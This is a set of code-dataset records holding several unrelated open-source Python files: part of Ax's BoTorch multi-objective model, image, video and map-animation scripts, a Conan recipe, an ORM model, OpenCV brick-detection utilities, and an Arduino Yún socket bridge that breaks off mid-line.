This behavior\n can be modified by providing custom implementations of the following\n components:\n\n - a `model_constructor` that instantiates and fits a model on data\n - a `model_predictor` that predicts outcomes using the fitted model\n - a `acqf_constructor` that creates an acquisition function from a fitted model\n - a `acqf_optimizer` that optimizes the acquisition function\n\n Args:\n model_constructor: A callable that instantiates and fits a model on data,\n with signature as described below.\n model_predictor: A callable that predicts using the fitted model, with\n signature as described below.\n acqf_constructor: A callable that creates an acquisition function from a\n fitted model, with signature as described below.\n acqf_optimizer: A callable that optimizes an acquisition\n function, with signature as described below.\n\n\n\n Call signatures:\n\n ::\n\n model_constructor(\n Xs,\n Ys,\n Yvars,\n task_features,\n fidelity_features,\n metric_names,\n state_dict,\n **kwargs,\n ) -> model\n\n Here `Xs`, `Ys`, `Yvars` are lists of tensors (one element per outcome),\n `task_features` identifies columns of Xs that should be modeled as a task,\n `fidelity_features` is a list of ints that specify the positions of fidelity\n parameters in 'Xs', `metric_names` provides the names of each `Y` in `Ys`,\n `state_dict` is a pytorch module state dict, and `model` is a BoTorch `Model`.\n Optional kwargs are being passed through from the `BotorchModel` constructor.\n This callable is assumed to return a fitted BoTorch model that has the same\n dtype and lives on the same device as the input tensors.\n\n ::\n\n model_predictor(model, X) -> [mean, cov]\n\n Here `model` is a fitted botorch model, `X` is a tensor of candidate points,\n and `mean` and `cov` are the posterior mean and covariance, respectively.\n\n ::\n\n acqf_constructor(\n model,\n objective_weights,\n outcome_constraints,\n X_observed,\n X_pending,\n **kwargs,\n ) -> acq_function\n\n\n Here `model` is a botorch `Model`, `objective_weights` is a tensor of weights\n for the model outputs, `outcome_constraints` is a tuple of tensors describing\n the (linear) outcome constraints, `X_observed` are previously observed points,\n and `X_pending` are points whose evaluation is pending. `acq_function` is a\n BoTorch acquisition function crafted from these inputs. For additional\n details on the arguments, see `get_qLogNEHVI`.\n\n ::\n\n acqf_optimizer(\n acq_function,\n bounds,\n n,\n inequality_constraints,\n fixed_features,\n rounding_func,\n **kwargs,\n ) -> candidates\n\n Here `acq_function` is a BoTorch `AcquisitionFunction`, `bounds` is a tensor\n containing bounds on the parameters, `n` is the number of candidates to be\n generated, `inequality_constraints` are inequality constraints on parameter\n values, `fixed_features` specifies features that should be fixed during\n generation, and `rounding_func` is a callback that rounds an optimization\n result appropriately. 
`candidates` is a tensor of generated candidates.\n For additional details on the arguments, see `scipy_optimizer`.\n\n ::\n\n frontier_evaluator(\n model,\n objective_weights,\n objective_thresholds,\n X,\n Y,\n Yvar,\n outcome_constraints,\n )\n\n Here `model` is a botorch `Model`, `objective_thresholds` is used in hypervolume\n evaluations, `objective_weights` is a tensor of weights applied to the objectives\n (sign represents direction), `X`, `Y`, `Yvar` are tensors, `outcome_constraints` is\n a tuple of tensors describing the (linear) outcome constraints.\n \"\"\"\n\n dtype: Optional[torch.dtype]\n device: Optional[torch.device]\n Xs: List[Tensor]\n Ys: List[Tensor]\n Yvars: List[Tensor]\n\n def __init__(\n self,\n model_constructor: TModelConstructor = get_and_fit_model,\n model_predictor: TModelPredictor = predict_from_model,\n # pyre-fixme[9]: acqf_constructor has type `Callable[[Model, Tensor,\n # Optional[Tuple[Tensor, Tensor]], Optional[Tensor], Optional[Tensor], Any],\n # AcquisitionFunction]`; used as `Callable[[Model, Tensor,\n # Optional[Tuple[Tensor, Tensor]], Optional[Tensor], Optional[Tensor],\n # **(Any)], AcquisitionFunction]`.\n acqf_constructor: TAcqfConstructor = get_qLogNEHVI,\n # pyre-fixme[9]: acqf_optimizer has type `Callable[[AcquisitionFunction,\n # Tensor, int, Optional[Dict[int, float]], Optional[Callable[[Tensor],\n # Tensor]], Any], Tensor]`; used as `Callable[[AcquisitionFunction, Tensor,\n # int, Optional[Dict[int, float]], Optional[Callable[[Tensor], Tensor]],\n # **(Any)], Tensor]`.\n acqf_optimizer: TOptimizer = scipy_optimizer,\n # TODO: Remove best_point_recommender for botorch_moo. Used in modelbridge._gen.\n best_point_recommender: TBestPointRecommender = recommend_best_observed_point,\n frontier_evaluator: TFrontierEvaluator = pareto_frontier_evaluator,\n refit_on_cv: bool = False,\n refit_on_update: bool = True,\n warm_start_refitting: bool = False,\n use_input_warping: bool = False,\n use_loocv_pseudo_likelihood: bool = False,\n prior: Optional[Dict[str, Any]] = None,\n **kwargs: Any,\n ) -> None:\n self.model_constructor = model_constructor\n self.model_predictor = model_predictor\n self.acqf_constructor = acqf_constructor\n self.acqf_optimizer = acqf_optimizer\n self.best_point_recommender = best_point_recommender\n self.frontier_evaluator = frontier_evaluator\n # pyre-fixme[4]: Attribute must be annotated.\n self._kwargs = kwargs\n self.refit_on_cv = refit_on_cv\n self.refit_on_update = refit_on_update\n self.warm_start_refitting = warm_start_refitting\n self.use_input_warping = use_input_warping\n self.use_loocv_pseudo_likelihood = use_loocv_pseudo_likelihood\n self.prior = prior\n self.model: Optional[Model] = None\n self.Xs = []\n self.Ys = []\n self.Yvars = []\n self.dtype = None\n self.device = None\n self.task_features: List[int] = []\n self.fidelity_features: List[int] = []\n self.metric_names: List[str] = []\n\n @copy_doc(TorchModel.gen)\n def gen(\n self,\n n: int,\n search_space_digest: SearchSpaceDigest,\n torch_opt_config: TorchOptConfig,\n ) -> TorchGenResults:\n options = torch_opt_config.model_gen_options or {}\n acf_options = options.get(\"acquisition_function_kwargs\", {})\n optimizer_options = options.get(\"optimizer_kwargs\", {})\n\n if search_space_digest.fidelity_features: # untested\n raise NotImplementedError(\n \"fidelity_features not implemented for base BotorchModel\"\n )\n if (\n torch_opt_config.objective_thresholds is not None\n and torch_opt_config.objective_weights.shape[0]\n != 
not_none(torch_opt_config.objective_thresholds).shape[0]\n        ):\n            raise AxError(\n                \"Objective weights and thresholds must both contain an element for\"\n                \" each modeled metric.\"\n            )\n\n        X_pending, X_observed = _get_X_pending_and_observed(\n            Xs=self.Xs,\n            objective_weights=torch_opt_config.objective_weights,\n            bounds=search_space_digest.bounds,\n            pending_observations=torch_opt_config.pending_observations,\n            outcome_constraints=torch_opt_config.outcome_constraints,\n            linear_constraints=torch_opt_config.linear_constraints,\n            fixed_features=torch_opt_config.fixed_features,\n        )\n\n        model = not_none(self.model)\n        full_objective_thresholds = torch_opt_config.objective_thresholds\n        full_objective_weights = torch_opt_config.objective_weights\n        full_outcome_constraints = torch_opt_config.outcome_constraints\n        # subset model only to the outcomes we need for the optimization\n        if options.get(Keys.SUBSET_MODEL, True):\n            subset_model_results = subset_model(\n                model=model,\n                objective_weights=torch_opt_config.objective_weights,\n                outcome_constraints=torch_opt_config.outcome_constraints,\n                objective_thresholds=torch_opt_config.objective_thresholds,\n            )\n            model = subset_model_results.model\n            objective_weights = subset_model_results.objective_weights\n            outcome_constraints = subset_model_results.outcome_constraints\n            objective_thresholds = subset_model_results.objective_thresholds\n            idcs = subset_model_results.indices\n        else:\n            objective_weights = torch_opt_config.objective_weights\n            outcome_constraints = torch_opt_config.outcome_constraints\n            objective_thresholds = torch_opt_config.objective_thresholds\n            idcs = None\n\n        bounds_ = torch.tensor(\n            search_space_digest.bounds, dtype=self.dtype, device=self.device\n        )\n        bounds_ = bounds_.transpose(0, 1)\n        botorch_rounding_func = get_rounding_func(torch_opt_config.rounding_func)\n        if acf_options.pop(\"random_scalarization\", False) or acf_options.get(\n            \"chebyshev_scalarization\", False\n        ):\n            # If using a list of acquisition functions, the algorithm to generate\n            # that list is configured by acquisition_function_kwargs.\n            if \"random_scalarization_distribution\" in acf_options:\n                randomize_weights_kws = {\n                    \"random_scalarization_distribution\": acf_options[\n                        \"random_scalarization_distribution\"\n                    ]\n                }\n                del acf_options[\"random_scalarization_distribution\"]\n            else:\n                randomize_weights_kws = {}\n            objective_weights_list = [\n                randomize_objective_weights(objective_weights, **randomize_weights_kws)\n                for _ in range(n)\n            ]\n            acquisition_function_list = [\n                self.acqf_constructor(\n                    model=model,\n                    objective_weights=objective_weights,\n                    outcome_constraints=outcome_constraints,\n                    X_observed=X_observed,\n                    X_pending=X_pending,\n                    **acf_options,\n                )\n                for objective_weights in objective_weights_list\n            ]\n            acquisition_function_list = [\n                checked_cast(AcquisitionFunction, acq_function)\n                for acq_function in acquisition_function_list\n            ]\n            # Multiple acquisition functions require a sequential optimizer\n            # always use scipy_optimizer_list.\n            # TODO(jej): Allow any optimizer.\n            candidates, expected_acquisition_value = scipy_optimizer_list(\n                acq_function_list=acquisition_function_list,\n                bounds=bounds_,\n                inequality_constraints=_to_inequality_constraints(\n                    linear_constraints=torch_opt_config.linear_constraints\n                ),\n                fixed_features=torch_opt_config.fixed_features,\n                rounding_func=botorch_rounding_func,\n                **optimizer_options,\n            )\n        else:\n            if (\n                objective_thresholds is None\n                or objective_thresholds[objective_weights != 0].isnan().any()\n            ):\n                full_objective_thresholds = 
infer_objective_thresholds(\n                    model=model,\n                    X_observed=not_none(X_observed),\n                    objective_weights=full_objective_weights,\n                    outcome_constraints=full_outcome_constraints,\n                    subset_idcs=idcs,\n                    objective_thresholds=objective_thresholds,\n                )\n                # subset the objective thresholds\n                objective_thresholds = (\n                    full_objective_thresholds\n                    if idcs is None\n                    else full_objective_thresholds[idcs].clone()\n                )\n            acquisition_function = self.acqf_constructor(\n                model=model,\n                objective_weights=objective_weights,\n                objective_thresholds=objective_thresholds,\n                outcome_constraints=outcome_constraints,\n                X_observed=X_observed,\n                X_pending=X_pending,\n                **acf_options,\n            )\n            acquisition_function = checked_cast(\n                AcquisitionFunction, acquisition_function\n            )\n            # pyre-ignore: [28]\n            candidates, expected_acquisition_value = self.acqf_optimizer(\n                acq_function=checked_cast(AcquisitionFunction, acquisition_function),\n                bounds=bounds_,\n                n=n,\n                inequality_constraints=_to_inequality_constraints(\n                    linear_constraints=torch_opt_config.linear_constraints\n                ),\n                fixed_features=torch_opt_config.fixed_features,\n                rounding_func=botorch_rounding_func,\n                **optimizer_options,\n            )\n        gen_metadata = {\n            \"expected_acquisition_value\": expected_acquisition_value.tolist(),\n            \"objective_weights\": full_objective_weights.cpu(),\n        }\n        if full_objective_thresholds is not None:\n            gen_metadata[\"objective_thresholds\"] = full_objective_thresholds.cpu()\n        return TorchGenResults(\n            points=candidates.detach().cpu(),\n            weights=torch.ones(n, dtype=self.dtype),\n            gen_metadata=gen_metadata,\n        )\n","repo_name":"facebook/Ax","sub_path":"ax/models/torch/botorch_moo.py","file_name":"botorch_moo.py","file_ext":"py","file_size_in_byte":16067,"program_lang":"python","lang":"en","doc_type":"code","stars":2182,"dataset":"github-code","pt":"77"} +{"seq_id":"3431349899","text":"import skimage.io\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n# Load the image\npltimage = skimage.io.imread(\"~/Schreibtisch/lenna_2048.png\", as_gray=True)\n\n# Convert the image to a NumPy array\npltimage = np.array(pltimage)\n\n# Compute the height scale for the plot\nheight = pltimage.mean()\n\n# Create a 3D plot\nfig = plt.figure()\nax = fig.add_subplot(111, projection=\"3d\")\n\n# Compute the X and Y coordinates of the points\nx = np.arange(pltimage.shape[0])\ny = np.arange(pltimage.shape[1])\n\n# Build a grid from the X and Y coordinates\nX, Y = np.meshgrid(x, y)\n\n# Build an array with the heights of the points\nZ = pltimage / height\n\n# Draw the 3D surface\nax.plot_surface(X, Y, Z, cmap=\"gray\")\n\n# Show the plot\nplt.show()","repo_name":"skranz0/mustererkennung","sub_path":"lenna3d.py","file_name":"lenna3d.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24708711898","text":"#!/usr/bin/env python\n\nimport os\nimport cv2\nimport re\nimport sys\nfrom PIL import Image\n\n\ndef frame_dir():\n    try:\n        return sys.argv[1]\n    except:\n        return os.getcwd()\n\n\ndef atoi(text):\n    return int(text) if text.isdigit() else text\n\n\ndef natural_keys(text):\n    '''\n    source: https://stackoverflow.com/a/5967539\n    '''\n    return [ atoi(c) for c in re.split(r'(\\d+)', text) ]\n\n\ndef listframes(path_with_frames):\n    _listframes = [img for img in os.listdir(path_with_frames)\n                    if img.endswith(\".jpg\") or\n                       img.endswith(\".jpeg\") or\n                       img.endswith(\".png\")]\n    _listframes.sort(key=natural_keys)\n    return _listframes\n\n\ndef get_video_size(path_with_frames, 
list_of_frames):\n    mean_height = 0\n    mean_width = 0\n    num_of_images = len(list_of_frames)\n\n    for frame in list_of_frames:\n        width, height = Image.open(os.path.join(path_with_frames, frame)).size\n        mean_height += height\n        mean_width += width\n\n    mean_height /= num_of_images\n    mean_width /= num_of_images\n    return (int(mean_width), int(mean_height))\n\n\ndef resize_frames(path_with_frames, list_of_frames, size):\n    for frame in list_of_frames:\n        framepath = os.path.join(path_with_frames, frame)\n        im = Image.open(framepath)\n\n        imResize = im.resize(size, Image.LANCZOS)\n        imResize.save(framepath, 'PNG', quality = 100) # setting quality\n        # printing each resized image name\n        print(\"resized:\", frame)\n\n\ndef generate_video(path_with_frames, list_of_frames, video_file, size):\n    fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n\n    video = cv2.VideoWriter(video_file, fourcc, FRAMES_PER_SECOND, size, True)\n\n    last_framepath = None\n    for frame in list_of_frames:\n        print(\"adding frame:\", frame)\n        framepath = os.path.join(path_with_frames, frame)\n        video.write(cv2.imread(framepath))\n        last_framepath = framepath\n    for _ in range(REPEAT_LAST_FRAME_FOR_COUNT):\n        video.write(cv2.imread(last_framepath))\n\n    cv2.destroyAllWindows() # Deallocating memories taken for window creation\n    video.release()  # releasing the video generated\n\ndef main():\n    path_with_frames = frame_dir()\n    all_frames = listframes(path_with_frames)\n    if all_frames is None or len(all_frames) == 0:\n        print(\"found no frames at %s\" % (path_with_frames))\n        sys.exit(1)\n    video_size = get_video_size(path_with_frames, all_frames)\n    resize_frames(path_with_frames, all_frames, video_size)\n    generate_video(path_with_frames, all_frames, VIDEO_NAME, video_size)\n\n\nFRAMES_PER_SECOND = 24 ## common across scripts\nVIDEO_NAME = '/tmp/mygeneratedvideo.avi'\nREPEAT_LAST_FRAME_FOR_COUNT = 48\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"abhishekkr/lyrical-video-generator","sub_path":"create-video.py","file_name":"create-video.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"70627329530","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 26 10:17:15 2016\n\nGet operational stations from the Global Runoff Data Centre (GRDC)\nper year and their distribution\n\n@author: Marc.Girons\n\"\"\"\n\nimport os\nimport glob\nimport shutil\nimport numpy as np\nimport pandas as pd\nfrom io import BytesIO\nfrom zipfile import ZipFile\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\nfrom urllib.request import urlopen\nfrom matplotlib.lines import Line2D\nfrom mpl_toolkits.basemap import Basemap\n\n# %%\n\n\ndef extract_from_url(zipurl, path):\n    \"\"\"extract a zip file to the cwd given its url address\n    \"\"\"\n\n    print('Fetching and unzipping file...')\n\n    if not os.path.exists(path):\n        os.makedirs(path)\n\n    with urlopen(zipurl) as zipresp:\n        with ZipFile(BytesIO(zipresp.read())) as zfile:\n            zfile.extractall(path)\n\n\ndef parse_grdc_file(path):\n    \"\"\"import the grdc stations excel file to a pandas dataframe and\n    convert a number of columns to the suitable data type\n    \"\"\"\n\n    print('Parsing file...')\n\n    filename = glob.glob(path + '*GRDC_Stations.xlsx')[0]\n\n    with open(filename, 'rb') as excelfile:\n        data = pd.read_excel(excelfile, sheet_name='grdc_metadata', index_col=0)\n\n    num_cols = ['d_start', 'd_end', 'd_yrs', 'd_miss',\n                'm_start', 'm_end', 'm_yrs', 'm_miss']\n\n    dt_cols = ['f_import', 'l_import']\n\n    for 
column in num_cols:\n data[column] = pd.to_numeric(data[column], errors='coerce')\n\n for column in dt_cols:\n data[column] = pd.to_datetime(data[column], format='%d.%m.%Y')\n\n return data\n\n\ndef get_data_period(data):\n \"\"\"return the measurement start and end years as well as the\n associated period\n \"\"\"\n\n print('Establishing data period...')\n\n m_start = np.min(data['m_start'])\n m_end = np.max(data['m_end'])\n\n period = np.arange(m_start, m_end).astype(int)\n\n return m_start, m_end, period\n\n\ndef count_stations(data, period):\n \"\"\"count the available grdc stations for a given year\n \"\"\"\n\n print('Calculating yearly available stations...')\n\n stations = np.zeros_like(period)\n\n for index_p, year in enumerate(period):\n for index_s, station in enumerate(data.index):\n if (year >= data['m_start'].iloc[index_s] and\n year <= data['m_end'].iloc[index_s]):\n stations[index_p] += 1\n\n return stations\n\n\ndef get_station_locations(data, period):\n \"\"\"get the coordinates of the grdc stations operational in\n a given year\n \"\"\"\n\n print('Processing available stations locations...')\n\n locations = {}\n\n for year in period:\n ls = []\n for index_s, station in enumerate(data.index):\n if (year >= data['m_start'].iloc[index_s] and\n year <= data['m_end'].iloc[index_s]):\n lat = data['lat'].iloc[index_s]\n lon = data['long'].iloc[index_s]\n coors = (lon, lat)\n ls.append(coors)\n locations[year] = np.array(ls)\n\n return locations\n\n\nclass SubplotAnimation(animation.TimedAnimation):\n\n def __init__(self, stations, locations, period):\n\n print('Plotting figure...')\n\n fig = plt.figure(figsize=(12, 4))\n ax1 = plt.subplot2grid((1, 3), (0, 0))\n ax2 = plt.subplot2grid((1, 3), (0, 1), colspan=2)\n\n self.stations = stations\n self.locations = locations\n self.period = period\n\n ax1.set_xlabel('Time (year)')\n ax1.set_ylabel('GRDC stations')\n self.time = Line2D([], [], color='#FF8000', linewidth=3)\n ax1.add_line(self.time)\n ax1.set_xlim(m_start, m_end)\n ax1.set_ylim(0, 5000)\n\n m = Basemap(projection='cyl', llcrnrlat=-90, urcrnrlat=90,\n llcrnrlon=-180, urcrnrlon=180, resolution='l')\n m.fillcontinents(color='0.8')\n # m.drawmapboundary(linewidth=1)\n m.drawrivers(linewidth=0.2, color='C0')\n m.drawcountries(linewidth=0.4, color='w')\n self.space = m.plot([], [], markersize=3, linestyle='None',\n marker='o', color='#FF8000',\n markeredgecolor='none')[0]\n ax2.add_line(self.space)\n ax2.set_xlabel('GRDC stations')\n self.text = ax2.text(150, 75, '', fontsize=12)\n\n fig.tight_layout()\n\n animation.TimedAnimation.__init__(self, fig, interval=100, blit=True)\n\n def _draw_frame(self, framedata):\n\n i = framedata\n self.time.set_data(self.period[:i], self.stations[:i])\n\n year = self.period[i]\n lons = self.locations[year][:, 0]\n lats = self.locations[year][:, 1]\n self.space.set_data(lons, lats)\n\n self.text.set_text(str(year))\n\n self._drawn_artists = [self.time, self.space, self.text]\n\n def new_frame_seq(self):\n return iter(range(self.period.size))\n\n def _init_draw(self):\n self.time.set_data([], [])\n self.space.set_data([], [])\n self.text.set_text('')\n\n# %%\n\nif __name__ == '__main__':\n\n zipurl = ('http://www.bafg.de/GRDC/EN/02_srvcs/21_tmsrs/211_ctlgs/' +\n 'GRDC_Stations.zip?__blob=publicationFile')\n\n path = os.getcwd() + '\\\\..\\\\tmp\\\\'\n\n extract_from_url(zipurl, path)\n data = parse_grdc_file(path)\n m_start, m_end, period = get_data_period(data)\n stations = count_stations(data, period)\n locations = get_station_locations(data, 
period)\n\n ani = SubplotAnimation(stations, locations, period)\n\n ani.save(os.getcwd() + '\\\\..\\\\GRDC_time_lapse.mp4', dpi=300)\n\n shutil.rmtree(path)\n\n plt.show()\n","repo_name":"GironsLopez/GRDC-visualization","sub_path":"src/GRDC-visualization.py","file_name":"GRDC-visualization.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"31961086445","text":"from conan import ConanFile\nfrom conan.tools.files import get, copy\nfrom conan.tools.layout import basic_layout\nimport os\n\n\nrequired_conan_version = \">=1.50.0\"\n\n\nclass PackageConan(ConanFile):\n name = \"psyinf-gmtl\"\n description = \"The Generic Math Template Library. A math library designed to be high-performance, extensible, and generic.\"\n license = \"LGPL-2.1-only\"\n url = \"https://github.com/conan-io/conan-center-index\"\n homepage = \"https://github.com/psyinf/gmtl\"\n topics = (\"linear-algebra\", \"collision\", \"vector\", \"matrix\", \"template\", \"math\", \"header-only\")\n settings = \"os\", \"arch\", \"compiler\", \"build_type\" \n no_copy_source = True \n \n def layout(self):\n basic_layout(self, src_folder=\"src\")\n\n def package_id(self):\n self.info.clear()\n\n def source(self):\n get(self, **self.conan_data[\"sources\"][self.version], destination=self.source_folder, strip_root=True)\n\n def package(self):\n copy(self, pattern=\"LICENSE\", dst=os.path.join(self.package_folder, \"licenses\"), src=self.source_folder)\n copy(self, pattern=\"COPYING\", dst=os.path.join(self.package_folder, \"licenses\"), src=self.source_folder)\n copy(\n self,\n pattern=\"*.h\",\n dst=os.path.join(self.package_folder, \"include\"),\n src=self.source_folder,\n )\n\n def package_info(self):\n self.cpp_info.bindirs = []\n self.cpp_info.libdirs = []\n self.cpp_info.names[\"cmake_find_package\"] = \"gmtl\"\n self.cpp_info.names[\"cmake_find_package_multi\"] = \"gmtl\"\n \n self.cpp_info.set_property(\"cmake_file_name\", \"gmtl\")\n self.cpp_info.set_property(\"cmake_target_name\", \"gmtl::gmtl\")\n self.cpp_info.set_property(\"pkg_config_name\", \"gmtl\")\n\n \n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/psyinf-gmtl/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"4006001086","text":"#!/usr/bin/python3\n\"\"\" This is the State Module for HBNB project \"\"\"\nfrom models.base_model import BaseModel, Base\nfrom sqlalchemy import Column, String\nfrom sqlalchemy.orm import relationship\nfrom os import getenv\n\n\nclass State(BaseModel, Base):\n \"\"\"Is the State class\"\"\"\n __tablename__ = 'states'\n if getenv('HBNB_TYPE_STORAGE') == 'db':\n name = Column(String(128), nullable=False)\n cities = relationship('City', backref=\"state\",\n cascade=\"all, delete, delete-orphan\")\n else:\n name = \"\"\n\n @property\n def cities(self):\n \"\"\"Getter\"\"\"\n from models import storage\n from models.city import City\n all_cities = []\n for city_obj in storage.all(City).values():\n # key = key.split(\".\")[0]\n # if key == \"City\" and city_obj.state_id == self.id:\n if city_obj.state_id == self.id:\n all_cities.append(city_obj)\n return 
all_cities\n","repo_name":"pepe-sm/AirBnB_clone_v2","sub_path":"models/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"21375406401","text":"\n'''\n'''\n\nimport cv2\nimport numpy as np\nimport urllib.request\n\n'''\nhttps://github.com/alexleavitt/uscplayspokemon/blob/master/tommycam.py\n'''\ndef get_video_capture_frame(video_capture_url_jpg_str):\n    img_request = urllib.request.urlopen(video_capture_url_jpg_str)\n    img_arr = np.asarray(bytearray(img_request.read()), dtype=np.uint8) \n    original_frame = cv2.imdecode(img_arr,-1)\n    return original_frame\n\n'''\nhttps://docs.opencv.org/master/d7/d4d/tutorial_py_thresholding.html\n'''\ndef threshold_frame(img_frame, min_threshold):\n    ret, thresholded_frame = cv2.threshold(img_frame, min_threshold, 255, cv2.THRESH_BINARY)\n    return thresholded_frame\n\n\n'''\nhttps://docs.opencv.org/master/d4/d13/tutorial_py_filtering.html\nhttps://docs.opencv.org/master/d4/d86/group__imgproc__filter.html#ga9d7064d478c95d60003cf839430737ed\n'''\ndef remove_noise(img_frame):\n    result = img_frame\n    result = cv2.bilateralFilter(result,16,32,32) \n    \n    kernel = np.ones((2, 2),np.uint8)\n    result = cv2.morphologyEx(result, cv2.MORPH_OPEN, kernel) \n    \n    kernel = np.ones((9, 9),np.uint8)\n    result = cv2.morphologyEx(result, cv2.MORPH_CLOSE, kernel)\n    \n    result = cv2.bilateralFilter(result,3,16,16)\n    return result\n\n'''\nhttps://docs.opencv.org/master/df/d9d/tutorial_py_colorspaces.html\nhttps://stackoverflow.com/questions/56905592/automatic-contrast-and-brightness-adjustment-of-a-color-photo-of-a-sheet-of-pape????\n'''\ndef blue_color_mask(img_frame):\n    result = img_frame \n    \n    result = cv2.convertScaleAbs(result, alpha=1.95, beta=0)\n    \n    result = cv2.cvtColor(result, cv2.COLOR_BGR2HSV)\n    lower_blue = np.array([70,70,80])\n    upper_blue = np.array([140,255,255])\n    result = cv2.inRange(result, lower_blue, upper_blue)\n    return result\n\ndef filter_blue_bricks(img_frame):\n    result = img_frame\n    # result = remove_noise(result)\n    result = blue_color_mask(result)\n    result = find_brick_center(result) \n    return result\n\ndef filter_red_bricks(img_frame):\n    result = img_frame\n    # result = filter_excess_red_frame(img_frame)\n    result = threshold_frame(result, 200)\n    #result = remove_noise(result)\n    result = find_brick_center(result) \n    return result\n\ndef find_brick_center(img_frame):\n    result = img_frame\n    contours, hierarchy = cv2.findContours(result.astype('uint8'), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n    for brick in contours:\n        areal = cv2.contourArea(brick)\n        if(areal > 1500):\n            M = cv2.moments(brick)\n            cx = int(M['m10']/M['m00'])\n            cy = int(M['m01']/M['m00'])\n            result = cv2.circle(result,(cx, cy),10,(0,255,0))\n        elif(areal > 600):\n            M = cv2.moments(brick)\n            cx = int(M['m10']/M['m00'])\n            cy = int(M['m01']/M['m00'])\n            result = cv2.circle(result,(cx, cy),5,(0,255,0))\n    return result\n    \nwhile True:\n    dlink_video_jpg_url = 'http://192.168.0.20/image.jpg'\n    dlink_video_jpg_url2 = 'http://192.168.0.21/image.jpg'\n    img = get_video_capture_frame(dlink_video_jpg_url)\n    cropped_img = img[42:img.shape[0]-80, 0:img.shape[1]] # crop so it only shows table\n    \n    blue_bricks = filter_blue_bricks(cropped_img)\n    cv2.imshow('blue', blue_bricks) \n    \n    # red_bricks = filter_red_bricks(cropped_img)\n    # cv2.imshow('red', red_bricks)\n    \n    #img2 = get_video_capture_frame(dlink_video_jpg_url2)\n    #cv2.imshow('vid2', img2)\n    if cv2.waitKey(1) != -1:\n        break\n    
\n","repo_name":"grottrup/crustcrawler","sub_path":"nodes/vision_utilities.py","file_name":"vision_utilities.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25100357112","text":"import select\nimport socket\nimport sys\nimport Queue\nimport logging\nimport logging.handlers\nimport fcntl\nimport os\nimport signal\nimport argparse\nimport queuehandler\nimport termios\nimport atexit\n\n# Add usage and arguments for our options\nparser = argparse.ArgumentParser(description='New Bridge for Arduino Yún')\n\nparser.add_argument(\n '-q', '--quiet',\n action='store_true',\n help=\"don't print anything to the console\",\n default=False)\n\nparser.add_argument(\n '-d', '--debug',\n action='store_true',\n help='increase logging level (both to console and logfile)',\n default=False)\n\nparser.add_argument(\n '-P', '--port',\n type=int,\n help='local TCP port to listen on (default: 6571)',\n default=6571)\n\nparser.add_argument(\n '-l', '--log',\n help='file to log debugging to')\n\nargs = parser.parse_args()\n\n# Function to enable/disable local terminal echo.\ndef enable_echo(fd, enabled):\n (iflag, oflag, cflag, lflag, ispeed, ospeed, cc) \\\n = termios.tcgetattr(fd)\n if enabled:\n lflag |= termios.ECHO\n else:\n lflag &= ~termios.ECHO\n new_attr = [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]\n termios.tcsetattr(fd, termios.TCSANOW, new_attr)\n\n# disable terminal echo\nenable_echo(sys.stdin.fileno(), False)\natexit.register(enable_echo, sys.stdin.fileno(), True)\n\n# make stdin a non-blocking file\nfd = sys.stdin.fileno()\nfl = fcntl.fcntl(fd, fcntl.F_GETFL)\nfcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)\n\n# Set up logging\nlogger = logging.getLogger()\nformatter = logging.Formatter('%(asctime)s %(levelname)-8s %(message)s', \"%Y-%m-%d %H:%M:%S\")\n\nif args.debug:\n logger.setLevel(logging.DEBUG)\nelse:\n logger.setLevel(logging.INFO)\n\n# Send logging to the specified logfile, if specified\nif args.log is not None:\n q = Queue.Queue(-1)\n qh = queuehandler.QueueHandler(q)\n fh = logging.FileHandler(args.log)\n ql = queuehandler.QueueListener(q, fh)\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n logger.addHandler(qh)\n ql.start()\n\n# Don't send anything to the console if we're asked to be quiet\nif not args.quiet:\n ch = logging.StreamHandler()\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\nsl = logging.handlers.SysLogHandler(address='/dev/log')\nslf = logging.Formatter('%(filename)s[%(process)d]: %(message)s')\nsl.setFormatter(slf)\nsl.setLevel(logging.WARNING)\nlogger.addHandler(sl)\n\n# Catch the Keyboard Interrupt\ndef signal_handler(signal, frame):\n logger.warn('caught Ctrl+C. 
Terminating.')\n    if 'ql' in globals():\n        ql.stop()\n    sys.exit(0)\nsignal.signal(signal.SIGINT, signal_handler)\n\n# Create a TCP/IP socket\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nserver.setblocking(0)\n\n# Bind the socket to the port\nserver_address = ('', args.port)\nlogger.warn('pid %s starting up on port %s', os.getpid(), server_address)\nserver.bind(server_address)\n\n# Listen for incoming connections\nserver.listen(5)\n\n# Sockets from which we expect to read\ninputs = [ sys.stdin, server ]\n\n# Sockets to which we expect to write\noutputs = [ ]\n\n# Outgoing message queues (socket:Queue)\nmessage_queues = {}\n\n# Queue for stdout\nmessage_queues[sys.stdout] = Queue.Queue()\n\nwhile inputs:\n\n    # Wait for at least one of the sockets to be ready for processing\n    logger.debug('waiting for the next event')\n    readable, writable, exceptional = select.select(inputs, outputs, inputs)\n\n    # Handle inputs\n    for s in readable:\n\n        if s is server:\n            # A \"readable\" server socket is ready to accept a connection\n            connection, 